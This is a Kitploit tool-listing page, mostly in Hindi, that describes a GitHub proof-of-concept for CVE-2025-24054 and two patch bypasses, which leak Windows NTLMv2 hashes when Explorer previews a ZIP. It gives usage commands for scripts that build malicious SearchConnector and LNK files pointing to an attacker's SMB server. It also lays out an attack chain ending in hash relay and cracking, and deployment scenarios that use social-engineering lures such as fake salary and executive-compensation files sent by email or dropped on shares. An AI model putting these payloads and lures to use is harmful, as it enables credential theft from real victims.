Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
Log in
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-24054 — विंडोज़ फ़ाइल एक्सप्लोरर ज़ीरो क्लिक NTLMv2-SSP हैश प्रकटीकरण | Kitploit
उपकरण/GitHubGitHub/untouchable17/cve-2025-24054
पासवर्ड क्रैकिंगफ़िशिंग उपकरणपेलोड जनरेशनभेद्यता विश्लेषणशोषणपोस्ट-शोषणसामाजिक इंजीनियरिंग
GitHubuntouchable17/cve-2025-24054

CVE-2025-24054

विंडोज़ फ़ाइल एक्सप्लोरर ज़ीरो क्लिक NTLMv2-SSP हैश प्रकटीकरण

रिपॉजिटरी देखें
211910 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Windows File Explorer ज़ीरो क्लिक NTLMv2-SSP हैश प्रकटीकरण

🎥 डेमो POC + मार्च 2025 पैच बायपास

NTLMv2 Hash Disclosure Demo

🎥 पैच बायपास

NTLMv2 Hash Disclosure Demo

वल्नरेबिलिटी प्रदर्शन देखने के लिए ऊपर दी गई छवि पर क्लिक करें

📋 तकनीकी अवलोकन

यह रिपॉज़िटरी Windows Shell फ़ाइल प्रारूप प्रोसेसिंग में वल्नरेबिलिटी श्रृंखला का विश्लेषण करने वाला एक व्यापक शोध फ्रेमवर्क प्रदान करती है, जो NTLMv2-SSP क्रेडेंशियल प्रकटीकरण की ओर ले जाती है। यह टूलकिट दो अलग-अलग अटैक वेक्टर लागू करता है जो Windows Explorer में फ़ाइल प्रीव्यू ऑपरेशन के दौरान स्वचालित UNC पाथ रिज़ॉल्यूशन का शोषण करते हैं।

मुख्य वल्नरेबिलिटी तंत्र

मूल सुरक्षा समस्या Windows Shell द्वारा प्रीव्यू ऑपरेशन के दौरान विशिष्ट फ़ाइल प्रारूपों में एम्बेडेड UNC पाथों के स्वचालित प्रोसेसिंग में निहित है। जब उपयोगकर्ता विशेष रूप से तैयार की गई फ़ाइलों वाले ZIP आर्काइव खोलते हैं, तो Windows Explorer उपयोगकर्ता की सहमति के बिना UNC पाथों को स्वचालित रूप से रिज़ॉल्व करता है, SMB प्रमाणीकरण प्रयासों की शुरुआत करता है और NTLMv2-SSP हैश को हमलावर-नियंत्रित सर्वरों पर उजागर करता है।

अटैक सरफेस घटक

  • फ़ाइल प्रारूप पार्सिंग: XML-आधारित शेल फ़ाइलों और LNK शॉर्टकट गुणों की Windows Shell स्वचालित प्रोसेसिंग
  • ZIP कंटेनर बायपास: आर्काइव प्रीव्यू फ़ंक्शनलिटी जो Mark-of-the-Web (MOTW) सुरक्षाओं को दरकिनार करती है
  • प्रमाणीकरण ट्रिगर: मेटाडेटा निष्कर्षण और आइकन फ़ेचिंग ऑपरेशन के दौरान स्वचालित UNC रिज़ॉल्यूशन

🏗️ आर्किटेक्चर विकास

🔰 चरण 1: SearchConnector-आधारित प्रकटीकरण (CVE-2025-24054)

फ़ाइल: ntlm-disclosure-poc.py

यह प्रारंभिक इम्प्लीमेंटेशन Windows Search Connector (.searchConnector-ms) फ़ाइलों का शोषण करता है, जो XML-आधारित कॉन्फ़िगरेशन फ़ाइलें हैं जो Windows Explorer के लिए खोज स्थानों को परिभाषित करती हैं। वल्नरेबिलिटी तब ट्रिगर होती है जब Windows ZIP आर्काइव प्रीव्यू ऑपरेशन के दौरान simpleLocation एलिमेंट में एम्बेडेड UNC पाथ को स्वचालित रूप से प्रोसेस करता है।

तकनीकी विशेषताएँ:

  • Microsoft स्कीमा विनिर्देशों का पालन करने वाली XML-आधारित पेलोड संरचना
  • searchConnectorDescription एलिमेंट्स में UNC पाथ एम्बेडिंग
  • Windows Search Indexer और Explorer शेल द्वारा स्वचालित प्रोसेसिंग
  • पारंपरिक फ़ाइल निष्पादन प्रतिबंधों को बायपास करता है

🔰 चरण 2: LNK-इन-ZIP बायपास (CVE-2025-50154 / CVE-2025-59214)

फ़ाइल: patch_bypass.ps1

यह उन्नत तकनीक LNK फ़ाइल गुणों का लाभ उठाकर Microsoft के प्रारंभिक पैच को संबोधित करती है। यह हमला ZIP फ़ाइल प्रीव्यू के दौरान आइकन मेटाडेटा लाने और टारगेट पाथों को रिज़ॉल्व करने के Windows Explorer व्यवहार का शोषण करता है, साथ ही सावधानीपूर्वक गुण कॉन्फ़िगरेशन के माध्यम से ज़ीरो-क्लिक शोषण वेक्टर को बनाए रखता है।

तकनीकी विशेषताएँ:

  • TargetPath प्रॉपर्टी में UNC पाथ वाली LNK फ़ाइलें
  • प्रारंभिक डिटेक्शन तंत्र को बायपास करने के लिए लोकल आइकन संदर्भ
  • प्रीव्यू के दौरान Windows Shell स्वचालित प्रॉपर्टी निष्कर्षण
  • UNC रिज़ॉल्यूशन प्राप्त करते हुए फ़ाइल प्रारूप की वैधता बनाए रखता है

🔧 पूर्वापेक्षाएँ

Python PoC के लिए:
  • Python 3.6+
  • आवश्यक पैकेज: colorama
PowerShell PoC के लिए:
  • Windows PowerShell 5.1+
  • निष्पादन नीति: Set-ExecutionPolicy -ExecutionPolicy RemoteSigned -Scope CurrentUser

🔰 चरण 1: Python इम्प्लीमेंटेशन (CVE-2025-24054)

# Basic usage
python ntml-disclosure-poc.py 192.168.1.100

# With custom output file
python ntml-disclosure-poc.py 192.168.1.100 -o some_data.zip

# Example output
[+] Listener: 192.168.1.100
[*] Resource path: \\192.168.1.100\sharedir
[*] COMPLETE Package: Project_20241125_143022.zip
[*] Output: PATH\Project_20251123_175037.zip

Parameters
target (required): Target IP address or hostname
-o, --output: Custom output filename for ZIP package

🔰 चरण 2: PowerShell बायपास (CVE-2025-50154/59214)

# Basic usage - LNK file auto-removed
.\bypass.ps1 -IP 192.168.1.100

# Keep LNK file for external distribution
.\bypass.ps1 -IP 192.168.1.100 -KeepLnk

# Custom lure name and share
.\bypass.ps1 -IP 192.168.1.100 -Share documents -File budget.xlsx -Lure FileName" -KeepLnk

# Specify output directory
.\bypass.ps1 -IP 192.168.1.100 -OutDir "C:\Payloads" -KeepLnk


Parameters
-IP (required): Target SMB server IP address
-Share: SMB share name (default: 'share')
-File: Target filename (default: 'payload.exe')
-Lure: Social engineering filename (default: 'Your_File_For_Payload_Here')
-OutDir: Output directory (default: current directory)
-KeepLnk: Preserve LNK file after ZIP creation
वेक्टर ट्रिगर तंत्र उपयोगकर्ता इंटरैक्शन पैच स्थिति
🔗 SearchConnector XML पार्सिंग + UNC रिज़ॉल्यूशन ZIP खोलना🛡️ पैच्ड
📎 LNK TargetPath आइकन मेटाडेटा फ़ेच ZIP खोलना🔴 सक्रिय
graph TD
    A[🔴 CVE-2025-24054<br/>Initial Vulnerability] --> B[🛡️ Microsoft Patch]
    B --> C[🟠 CVE-2025-50154<br/>Bypass #1]
    C --> D[🛡️ Microsoft Patch]
    D --> E[🟡 CVE-2025-59214<br/>Bypass #2]
    E --> F[🔴 Current State<br/>Active Exploitation]
    
    style A fill:#ffcccc
    style C fill:#ffddcc
    style E fill:#ffffcc
    style F fill:#ccffcc

🔧 तकनीकी विनिर्देश

  1. 📦 पेलोड जनरेशन
    • UNC पाथ के साथ दुर्भावनापूर्ण फ़ाइल (SearchConnector/LNK) बनाएं
    • आकर्षक नाम के साथ ZIP आर्काइव में पैकेज करें
  2. 📤 डिलीवरी
    • ZIP को ईमेल/वेब/डाउनलोड के माध्यम से वितरित करें
  3. 💥 शोषण
    • पीड़ित Windows Explorer में ZIP खोलता है
    • स्वचालित फ़ाइल प्रीव्यू UNC रिज़ॉल्यूशन ट्रिगर करता है
    • NTLMv2-SSP हैश हमलावर को प्रेषित किया जाता है
  4. 🎭 पोस्ट-एक्सप्लॉइटेशन
    • हैश कैप्चर और रिले अटैक
    • पासवर्ड क्रैकिंग प्रयास

💀 तैनाती परिदृश्य

📨 परिदृश्य 1: डायरेक्ट ZIP वितरण

# Create ZIP payload
.\bypass.ps1 -IP 192.168.1.100 -Lure "Salary_Report_Q4_2025"

# Distribution vectors:
# - 📧 Email attachments with social engineering lures
# - ☁️ Compromised file sharing services
# - 🌐 Network share drops in enterprise environments

🔄 परिदृश्य 2: LNK फ़ाइल स्थानांतरण

# Create and preserve LNK file for multi-host deployment
.\bypass.ps1 -IP 192.168.1.100 -Lure "Project_Documentation" -KeepLnk

# Cross-host deployment:
copy-item "Project_Documentation.lnk" "\\remote-server\share\"
# Web-based distribution via compromised sites

🎯 परिदृश्य 3: लक्षित सोशल इंजीनियरिंग

.\bypass.ps1 -IP 192.168.1.100 -Share "HR_Documents" -File "compensation_review.xlsx" -Lure "Executive_Compensation_2025" -KeepLnk

डेवलपर से संपर्क करें

- Group & Contact: t.me/initial_persistence
- Email: [email protected]
टूल डाउनलोड करें